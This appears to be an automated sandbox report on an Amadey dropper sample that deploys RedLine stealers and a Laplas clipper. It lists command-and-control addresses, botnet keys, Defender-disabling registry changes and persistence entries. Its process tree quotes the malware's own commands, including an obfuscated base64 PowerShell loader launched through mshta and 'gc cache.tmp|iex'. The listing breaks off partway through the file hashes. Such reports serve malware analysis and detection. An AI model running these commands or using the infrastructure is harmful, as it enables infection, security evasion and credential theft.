amadey | 281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c

Analysis

max time kernel
52s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
16-03-2023 11:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe
Size

656KB
MD5

bc63c7b9a0e86a015325004b23b41259
SHA1

5d6d7acecc8d444d7ff82f50d0a09c300c992093
SHA256

281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c
SHA512

56c11c182283f5d5eae83c39a7c6b187de61f1a40aaf61a3a9b4168630885a318eb2d77c16a10a39aed4524a66bcf7aabf5f717b1992691f3ed25b1fb3a8a697
SSDEEP

12288:yMrLy90tBJpdRzVFvPbN3p4JP3I86LmG6K2uu7YiJZAPOkF/eXdkJ8:xymBFJVFvPbH4B488h6K2uuMiIGkFmQ8

Score

10^/10

amadey laplas redline @redlinevipchat cloud (tg: @fatherofcarders)lint matywon2 clipper discovery evasion infostealer persistence spyware stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

lint

193.233.20.28:4125

Attributes

auth_value
0e95262fb78243c67430f3148303e5b7

Extracted

Family

amadey

Version

3.68

62.204.41.87/joomla/index.php

Extracted

Family

redline

Botnet

@REDLINEVIPCHAT Cloud (TG: @FATHEROFCARDERS)

151.80.89.234:19388

Attributes

auth_value
56af49c3278d982f9a41ef2abb7c4d09

Extracted

Family

redline

Botnet

MatyWon2

85.31.54.216:43728

Attributes

auth_value
abc9e9d7ec3024110589ea03bcfaaa89

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	ns2764yZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	py70Ce70.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	py70Ce70.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	py70Ce70.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	ns2764yZ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	ns2764yZ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	ns2764yZ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	ns2764yZ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	py70Ce70.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	py70Ce70.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	py70Ce70.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	ns2764yZ.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	2060	rundll32.exe	40

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	ry58pL82.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	legenda.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	serv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	Setupdark.exe

Executes dropped EXE 16 IoCs

pid	Process
4896	will2739.exe
2808	will3672.exe
3036	ns2764yZ.exe
2856	py70Ce70.exe
336	qs2413Qh.exe
2324	ry58pL82.exe
2472	legenda.exe
3896	serv.exe
820	MatyWon.exe
392	2-1_2023-03-14_23-04.exe
3812	10MIL.exe
3784	MatyWon.exe
3944	MatyWon.exe
4272	MatyWon.exe
4536	Setupdark.exe
3984	MatyWon.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000023196-346.dat	upx
behavioral1/files/0x0006000000023196-356.dat	upx
behavioral1/files/0x0006000000023196-358.dat	upx
behavioral1/memory/4536-362-0x0000000140000000-0x0000000140042000-memory.dmp	upx
behavioral1/memory/4536-458-0x0000000140000000-0x0000000140042000-memory.dmp	upx
behavioral1/memory/4536-528-0x0000000140000000-0x0000000140042000-memory.dmp	upx

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	ns2764yZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	py70Ce70.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	py70Ce70.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe"	serv.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	will2739.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	will2739.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	will3672.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	will3672.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
85	api.ipify.org
86	api.ipify.org

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 820 set thread context of 4272	820	MatyWon.exe	124
PID 3944 set thread context of 3984	3944	MatyWon.exe	127

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2732	2856	WerFault.exe	98
3820	3896	WerFault.exe	119
5036	4288	WerFault.exe	141
1592	392	WerFault.exe	122

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4724	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3036	ns2764yZ.exe
3036	ns2764yZ.exe
2856	py70Ce70.exe
2856	py70Ce70.exe
336	qs2413Qh.exe
336	qs2413Qh.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3036	ns2764yZ.exe
Token: SeDebugPrivilege	2856	py70Ce70.exe
Token: SeDebugPrivilege	336	qs2413Qh.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2012 wrote to memory of 4896	2012	281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe	86
PID 2012 wrote to memory of 4896	2012	281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe	86
PID 2012 wrote to memory of 4896	2012	281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe	86
PID 4896 wrote to memory of 2808	4896	will2739.exe	87
PID 4896 wrote to memory of 2808	4896	will2739.exe	87
PID 4896 wrote to memory of 2808	4896	will2739.exe	87
PID 2808 wrote to memory of 3036	2808	will3672.exe	88
PID 2808 wrote to memory of 3036	2808	will3672.exe	88
PID 2808 wrote to memory of 2856	2808	will3672.exe	98
PID 2808 wrote to memory of 2856	2808	will3672.exe	98
PID 2808 wrote to memory of 2856	2808	will3672.exe	98
PID 4896 wrote to memory of 336	4896	will2739.exe	104
PID 4896 wrote to memory of 336	4896	will2739.exe	104
PID 4896 wrote to memory of 336	4896	will2739.exe	104
PID 2012 wrote to memory of 2324	2012	281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe	107
PID 2012 wrote to memory of 2324	2012	281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe	107
PID 2012 wrote to memory of 2324	2012	281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe	107
PID 2324 wrote to memory of 2472	2324	ry58pL82.exe	108
PID 2324 wrote to memory of 2472	2324	ry58pL82.exe	108
PID 2324 wrote to memory of 2472	2324	ry58pL82.exe	108
PID 2472 wrote to memory of 4724	2472	legenda.exe	109
PID 2472 wrote to memory of 4724	2472	legenda.exe	109
PID 2472 wrote to memory of 4724	2472	legenda.exe	109
PID 2472 wrote to memory of 1916	2472	legenda.exe	111
PID 2472 wrote to memory of 1916	2472	legenda.exe	111
PID 2472 wrote to memory of 1916	2472	legenda.exe	111
PID 1916 wrote to memory of 2120	1916	cmd.exe	113
PID 1916 wrote to memory of 2120	1916	cmd.exe	113
PID 1916 wrote to memory of 2120	1916	cmd.exe	113
PID 1916 wrote to memory of 4972	1916	cmd.exe	114
PID 1916 wrote to memory of 4972	1916	cmd.exe	114
PID 1916 wrote to memory of 4972	1916	cmd.exe	114
PID 1916 wrote to memory of 1560	1916	cmd.exe	115
PID 1916 wrote to memory of 1560	1916	cmd.exe	115
PID 1916 wrote to memory of 1560	1916	cmd.exe	115
PID 1916 wrote to memory of 1356	1916	cmd.exe	116
PID 1916 wrote to memory of 1356	1916	cmd.exe	116
PID 1916 wrote to memory of 1356	1916	cmd.exe	116
PID 1916 wrote to memory of 3952	1916	cmd.exe	117
PID 1916 wrote to memory of 3952	1916	cmd.exe	117
PID 1916 wrote to memory of 3952	1916	cmd.exe	117
PID 1916 wrote to memory of 2792	1916	cmd.exe	118
PID 1916 wrote to memory of 2792	1916	cmd.exe	118
PID 1916 wrote to memory of 2792	1916	cmd.exe	118
PID 2472 wrote to memory of 3896	2472	legenda.exe	119
PID 2472 wrote to memory of 3896	2472	legenda.exe	119
PID 2472 wrote to memory of 3896	2472	legenda.exe	119
PID 2472 wrote to memory of 820	2472	legenda.exe	120
PID 2472 wrote to memory of 820	2472	legenda.exe	120
PID 2472 wrote to memory of 820	2472	legenda.exe	120
PID 820 wrote to memory of 3784	820	MatyWon.exe	121
PID 820 wrote to memory of 3784	820	MatyWon.exe	121
PID 820 wrote to memory of 3784	820	MatyWon.exe	121
PID 2472 wrote to memory of 392	2472	legenda.exe	122
PID 2472 wrote to memory of 392	2472	legenda.exe	122
PID 2472 wrote to memory of 392	2472	legenda.exe	122
PID 2472 wrote to memory of 3812	2472	legenda.exe	123
PID 2472 wrote to memory of 3812	2472	legenda.exe	123
PID 2472 wrote to memory of 3812	2472	legenda.exe	123
PID 820 wrote to memory of 3784	820	MatyWon.exe	121
PID 820 wrote to memory of 4272	820	MatyWon.exe	124
PID 820 wrote to memory of 4272	820	MatyWon.exe	124
PID 820 wrote to memory of 4272	820	MatyWon.exe	124
PID 2472 wrote to memory of 3944	2472	legenda.exe	125

C:\Users\Admin\AppData\Local\Temp\281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe
"C:\Users\Admin\AppData\Local\Temp\281e296cb82c8ae4018acbd1049f255f74d72fd55e58cce02c5b87b73ac30d9c.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\will2739.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\will2739.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4896
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\will3672.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\will3672.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ns2764yZ.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ns2764yZ.exe
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Executes dropped EXE
      Windows security modification
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3036
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\py70Ce70.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\py70Ce70.exe
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Executes dropped EXE
      Windows security modification
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2856
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 1096
        5⤵
        Program crash
        
        PID:2732
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qs2413Qh.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qs2413Qh.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:336
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ry58pL82.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ry58pL82.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
    "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:4724
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1916
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2120
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "legenda.exe" /P "Admin:N"
        5⤵
        
        PID:4972
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "legenda.exe" /P "Admin:R" /E
        5⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:1356
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\f22b669919" /P "Admin:N"
        5⤵
        
        PID:3952
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\f22b669919" /P "Admin:R" /E
        5⤵
        
        PID:2792
  - - C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe
      "C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      PID:3896
    - - C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
        
        "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
        5⤵
        
        PID:1256
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 1224
        5⤵
        Program crash
        
        PID:3820
  - - C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
      "C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:820
    - - C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
        
        C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
        5⤵
        Executes dropped EXE
        
        PID:3784
    - - C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
        
        C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
        5⤵
        Executes dropped EXE
        
        PID:4272
  - - C:\Users\Admin\AppData\Local\Temp\1000036001\2-1_2023-03-14_23-04.exe
      "C:\Users\Admin\AppData\Local\Temp\1000036001\2-1_2023-03-14_23-04.exe"
      4⤵
      Executes dropped EXE
      PID:392
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 1364
        5⤵
        Program crash
        
        PID:1592
  - - C:\Users\Admin\AppData\Local\Temp\1000041001\10MIL.exe
      "C:\Users\Admin\AppData\Local\Temp\1000041001\10MIL.exe"
      4⤵
      Executes dropped EXE
      PID:3812
  - - C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
      "C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:3944
    - - C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
        
        C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
        5⤵
        Executes dropped EXE
        
        PID:3984
  - - C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe
      "C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:4536
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\7zSFX\KillDuplicate.cmd" "C:\Users\Admin\AppData\Local\Temp\7zSFX" "Setupdark.exe""
        5⤵
        
        PID:3376
    - - C:\Users\Admin\AppData\Local\Temp\7zSFX\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSFX\installer.exe"
        5⤵
        
        PID:5104
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell gc cache.tmp|iex
        6⤵
        
        PID:2784
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        5⤵
        
        PID:2020
  - - C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
      "C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe"
      4⤵
      PID:924
    - - C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
        
        C:\Users\Admin\AppData\Local\Temp\1000045001\MatyWon.exe
        5⤵
        
        PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe
      "C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe"
      4⤵
      PID:4236
    - - C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000047001\lish.exe" -h
        5⤵
        
        PID:4884
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
      4⤵
      PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2856 -ip 2856
1⤵
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3896 -ip 3896
1⤵
PID:116

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:4960
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  PID:4288
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 604
    3⤵
    - Program crash
    PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4288 -ip 4288
1⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 392 -ip 392
1⤵
PID:2920

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:4720

C:\Windows\system32\mshta.exe
mshta.exe vBsCrIPt:eXeCuTe("creaTeoBjEcT(""wScRIPt.sHell"").RuN ""POweRsHelL [sCRiPTblock]::cReaTe([TExt.eNCODIng]::uTf8.GeTStriNG([COnveRt]::FROmBase64StriNG('KFt0RVh0LmVuY09EaU5nXTo6VXRGOC5nRVRzVHJJTmcoW0NPbnZFcnRdOjpmUk9tQkFTRTY0U1RySW5HKChnUCAoKCgiezZ9ezF9ezd9ezl9ezB9ezN9ezR9ezh9ezV9ezJ9Ii1mJ31Tb2YnLCdLJywnZW0nLCd0d2FyJywnZScsJ3N0JywnSCcsJ0xNOnsnLCd7MH1TdWJzeScsJzAnKSkgIC1mIFtjaEFyXTkyKSkuTW9kdWxlcykpKXxpRXg='))).InVoKe()"", 0:close")
1⤵
PID:4996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [sCRiPTblock]::cReaTe([TExt.eNCODIng]::uTf8.GeTStriNG([COnveRt]::FROmBase64StriNG('KFt0RVh0LmVuY09EaU5nXTo6VXRGOC5nRVRzVHJJTmcoW0NPbnZFcnRdOjpmUk9tQkFTRTY0U1RySW5HKChnUCAoKCgiezZ9ezF9ezd9ezl9ezB9ezN9ezR9ezh9ezV9ezJ9Ii1mJ31Tb2YnLCdLJywnZW0nLCd0d2FyJywnZScsJ3N0JywnSCcsJ0xNOnsnLCd7MH1TdWJzeScsJzAnKSkgIC1mIFtjaEFyXTkyKSkuTW9kdWxlcykpKXxpRXg='))).InVoKe()
  2⤵
  PID:1608

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:3448
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5112
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:3604
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4252
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:864

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Windows\system32\config\systemprofile\AppData\Roaming\Google\Libs\g.log"
1⤵
PID:2564
- C:\Windows\System32\Wbem\WMIC.exe
  wmic PATH Win32_VideoController GET Name, VideoProcessor
  2⤵
  PID:5064

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:3888

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MatyWon.exe.log

Filesize
1KB

MD5
a3c82409506a33dec1856104ca55cbfd

SHA1
2e2ba4e4227590f8821002831c5410f7f45fe812

SHA256
780a0d4410f5f9798cb573bcd774561d1439987a39b1368d3c890226928cd203

SHA512
9621cfd3dab86d964a2bea6b3788fc19a895307962dcc41428741b8a86291f114df722e9017f755f63d53d09b5111e68f05aa505d9c9deae6c4378a87cdfa69f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe

Filesize
245KB

MD5
354b3a49c2eb26b415dad675be798021

SHA1
ab564aa0f4b8c1bb4840e5d53cf22bda139a8417

SHA256
c680866af40f12d71ea30dbc0ba4d02132b64cff08305df0f0827aed7fe99dd1

SHA512
0e7d8fd3dbfddae84f794630f71cd5e08ca82d08047ac04fdd754521e5ea42a326967da61b3c85762fcead5eeaa9c73ba60f073611379dd788ce6909652602c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe

Filesize
245KB

MD5
354b3a49c2eb26b415dad675be798021

SHA1
ab564aa0f4b8c1bb4840e5d53cf22bda139a8417

SHA256
c680866af40f12d71ea30dbc0ba4d02132b64cff08305df0f0827aed7fe99dd1

SHA512
0e7d8fd3dbfddae84f794630f71cd5e08ca82d08047ac04fdd754521e5ea42a326967da61b3c85762fcead5eeaa9c73ba60f073611379dd788ce6909652602c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe

Filesize
245KB

MD5
354b3a49c2eb26b415dad675be798021

SHA1
ab564aa0f4b8c1bb4840e5d53cf22bda139a8417

SHA256
c680866af40f12d71ea30dbc0ba4d02132b64cff08305df0f0827aed7fe99dd1

SHA512
0e7d8fd3dbfddae84f794630f71cd5e08ca82d08047ac04fdd754521e5ea42a326967da61b3c85762fcead5eeaa9c73ba60f073611379dd788ce6909652602c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe

Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
6a9b4f44a5d2cdab4770811543963e66f09d97ec

SHA256
a32d74feaebde8f218d02d99347983aa9b9be0ec85a4f409c5f210fbd3f861bb

SHA512
6a6a327210f5d35a307c1b9b66bf6e5b65b7cb2303e9126a5457a1be1ac708281cca0a4aea6d4b55e503e930a24213218271e261f80f5df4162be351317c8022

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe

Filesize
896KB

MD5
e01eed093c11df9172d1a70484e8f973

SHA1
